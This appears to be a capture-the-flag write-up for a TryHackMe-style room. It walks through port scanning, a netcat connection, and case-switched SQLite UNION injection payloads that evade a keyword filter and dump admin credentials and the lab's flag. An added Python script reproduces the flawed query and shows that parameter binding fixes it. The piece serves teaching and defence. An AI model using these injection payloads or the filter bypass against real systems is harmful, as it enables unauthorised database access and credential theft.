Light
Reconnaissance
We start by setting an environment variable for the target IP to simplify command execution:
export TARGET_IP=10.10.13.202
Full Port Scan with Nmap
sudo nmap -p- -Pn --min-rate 5000 $TARGET_IP
Results:
Not shown: 65441 closed tcp ports (reset), 92 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
We identified two open ports: 22 (SSH) and 1337 (unknown service).
Initial Access via Netcat
After detecting an open service on port 1337, we interact with it using Netcat:
nc $TARGET_IP 1337
Upon connecting, the service prompts for a username. Entering the provided username (smokey) returns a password:
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Because the service looks the username up and echoes back a stored value, the lookup may be vulnerable to SQL injection if the input is concatenated directly into the query rather than passed as a parameter.
SQL Injection Exploitation
Since the system returns data upon entering a username, we attempt SQL Injection to extract information.
Enumerating Tables
' uNion SeLeCt GrOuP_CoNcAt(name) From sqlite_master WhErE type='table' AnD 'a'='a
Explanation:
- sqlite_master → Stores database metadata, including the name of every table.
- type='table' → Filters only table names.
- GROUP_CONCAT(name) → Merges all table names into a single string.
- Case-switching bypass: some SQL keywords are blocked by the service, but changing their case circumvents the filter.
Discovered Tables:
usertable, admintable
Extracting Column Names from admintable
' uNiOn SeLeCt GrOuP_CoNcAt(name) From pragma_table_info('admintable') WhErE 'a'='a
Explanation:
- pragma_table_info('admintable') → Retrieves the column definitions of admintable.
- GROUP_CONCAT(name) → Concatenates all column names into a single string.
Columns Found:
id, username, password
Extracting Data from admintable
' uNiOn SeLeCt GrOuP_CoNcAt(id || ':' || username || ':' || password) From admintable WhErE 'a'='a
Extracted Credentials:
1:TryHackMeAdmin:mamZtAuMlrsEy5bp6q17
2:flag:THM{SQLit3_InJ3cTion_is_SimplE_nO?}
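The three injections above work because the service appears to build its query by string concatenation and to filter keywords with a case-sensitive deny-list. The following Python script is an added example, not the room's service code: it reproduces that flawed lookup against a constructed in-memory SQLite database (table layout borrowed from the write-up, secrets replaced by placeholders), shows the page's case-switched payloads enumerating the schema through it, and shows the same payloads returning nothing once the lookup is rewritten with a bound parameter. The deny-list contents and the exact query shape are assumptions.

```python
import sqlite3

# Constructed sample database: same two tables the write-up enumerates,
# with placeholder secrets instead of the room's real values.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usertable (id INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE admintable (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO usertable VALUES (1, 'smokey', 'user-secret-PLACEHOLDER')")
    conn.execute("INSERT INTO admintable VALUES (1, 'admin', 'admin-secret-PLACEHOLDER')")
    return conn

# Assumed deny-list: lowercase keywords only, matched case-sensitively.
# This is what lets the write-up's 'uNion SeLeCt' spelling slip through.
BLOCKED = ("union", "select")

def naive_filter(username):
    """Return True if the input is allowed (no lowercase blocked keyword present)."""
    return not any(word in username for word in BLOCKED)

def vulnerable_lookup(conn, username):
    """The flawed pattern: deny-list check, then string concatenation into SQL."""
    if not naive_filter(username):
        return None
    query = "SELECT password FROM usertable WHERE username = '" + username + "'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def safe_lookup(conn, username):
    """The fix: the username is bound as a parameter, so SQLite treats it as data only."""
    row = conn.execute(
        "SELECT password FROM usertable WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None

# Payloads copied from the write-up. Each closes the quoted string, UNIONs a
# single GROUP_CONCAT row onto the result and re-balances the trailing quote.
TABLE_ENUM_PAYLOAD = (
    "' uNion SeLeCt GrOuP_CoNcAt(name) From sqlite_master "
    "WhErE type='table' AnD 'a'='a"
)
COLUMN_ENUM_PAYLOAD = (
    "' uNiOn SeLeCt GrOuP_CoNcAt(name) From pragma_table_info('admintable') "
    "WhErE 'a'='a"
)

def demo():
    """Run both lookups against both payloads and return the observed results."""
    conn = build_db()
    return {
        "filter_blocks_lowercase": not naive_filter("' union select 1 -- "),
        "filter_passes_mixed_case": naive_filter(TABLE_ENUM_PAYLOAD),
        "vuln_tables": vulnerable_lookup(conn, TABLE_ENUM_PAYLOAD),
        "vuln_columns": vulnerable_lookup(conn, COLUMN_ENUM_PAYLOAD),
        "safe_tables": safe_lookup(conn, TABLE_ENUM_PAYLOAD),
        "safe_columns": safe_lookup(conn, COLUMN_ENUM_PAYLOAD),
        "safe_normal": safe_lookup(conn, "smokey"),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable path leaks the schema ("usertable,admintable", then "id,username,password") exactly as in the write-up, while the parameterised path returns None for both payloads and still returns the correct secret for a legitimate username. Tightening the deny-list (case-insensitive matching, more keywords) would only raise the bar; binding the parameter removes the bug.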